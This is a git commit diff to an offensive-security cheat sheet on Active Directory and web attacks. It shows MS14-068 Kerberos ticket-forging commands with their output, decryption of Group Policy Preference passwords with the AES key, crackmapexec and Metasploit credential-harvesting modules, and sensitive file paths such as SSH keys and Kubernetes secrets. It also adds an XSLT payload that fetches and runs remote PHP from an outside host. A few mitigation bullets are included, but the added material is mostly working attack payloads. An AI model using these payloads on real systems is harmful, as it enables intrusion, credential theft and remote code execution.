AD mitigations

This commit is contained in:
Swissky 2019-12-26 12:09:23 +01:00
parent 1535c5f1b3
commit 4b10c5e302
3 changed files with 60 additions and 20 deletions

View File

@ -117,6 +117,8 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
/home/$USER/.bash_history /home/$USER/.bash_history
/home/$USER/.ssh/id_rsa /home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount /var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
``` ```
### Interesting Windows files ### Interesting Windows files

View File

@ -9,7 +9,7 @@
- [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability) - [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
- [Open Shares](#open-shares) - [Open Shares](#open-shares)
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
- [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials) - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
- [Using ndtsutil](#using-ndtsutil) - [Using ndtsutil](#using-ndtsutil)
- [Using Vshadow](#using-vshadow) - [Using Vshadow](#using-vshadow)
@ -214,11 +214,22 @@ Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
``` ```
```powershell ```powershell
# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek # Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
git clone https://github.com/SecWiki/windows-kernel-exploits $ git clone https://github.com/SecWiki/windows-kernel-exploits
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword> $ python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org $ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10 $ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066
-1105
[+] Building AS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending AS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving AS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing AS-REP from msfdc01.metasploitable.local... Done!
[+] Building TGS-REQ for msfdc01.metasploitable.local... Done!
[+] Sending TGS-REQ to msfdc01.metasploitable.local... Done!
[+] Receiving TGS-REP from msfdc01.metasploitable.local... Done!
[+] Parsing TGS-REP from msfdc01.metasploitable.local... Done!
[+] Creating ccache file 'TGT_user01@metasploitable.local.ccache'... Done!
``` ```
Then use `mimikatz` to load the ticket. Then use `mimikatz` to load the ticket.
@ -237,6 +248,11 @@ Linux> sudo date -s "14 APR 2015 18:25:16"
Windows> net time /domain /set Windows> net time /domain /set
``` ```
#### Mitigations
* Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780
### Open Shares ### Open Shares
```powershell ```powershell
@ -317,11 +333,11 @@ IconIndex=1
``` ```
### GPO - Pivoting with Local Admin & Passwords in SYSVOL ### Passwords in SYSVOL & Group Policy Preferences
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
Find password in SYSVOL (MS14-025) Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.
```powershell ```powershell
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
@ -338,20 +354,22 @@ echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
``` ```
Metasploit modules to enumerate shares and credentials #### Automate the SYSVOL and passwords research
```c * Metasploit modules to enumerate shares and credentials
scanner/smb/smb_enumshares
post/windows/gather/enum_shares
post/windows/gather/credentials/gpp
```
Crackmapexec modules ```c
scanner/smb/smb_enumshares
post/windows/gather/enum_shares
post/windows/gather/credentials/gpp
```
```powershell * Crackmapexec modules
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password ```powershell
``` cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
```
List all GPO for a domain List all GPO for a domain
@ -364,6 +382,12 @@ Get-NetGPO
Get-NetGPOGroup Get-NetGPOGroup
``` ```
#### Mitigations
* Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
* Delete existing GPP xml files in SYSVOL containing passwords.
* Dont put passwords in files that are accessible by all authenticated users.
### Dumping AD Domain Credentials ### Dumping AD Domain Credentials
You will need the following files to extract the ntds : You will need the following files to extract the ntds :
@ -679,7 +703,7 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
``` ```
Mitigations: Mitigations:
* Have a very long password for your accounts with SPNs * Have a very long password for your accounts with SPNs (> 25 characters)
* Make sure no users have SPNs * Make sure no users have SPNs
### KRB_AS_REP Roasting ### KRB_AS_REP Roasting

View File

@ -132,6 +132,20 @@ Execute the function `scandir`.
</xsl:stylesheet> </xsl:stylesheet>
``` ```
Execute a remote php file using `assert`
```xml
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
<xsl:variable name="payload">
include("http://10.10.10.10/test.php")
</xsl:variable>
<xsl:variable name="include" select="php:function('assert',$payload)"/>
</body>
</html>
```
Execute a PHP meterpreter using PHP wrapper. Execute a PHP meterpreter using PHP wrapper.
```xml ```xml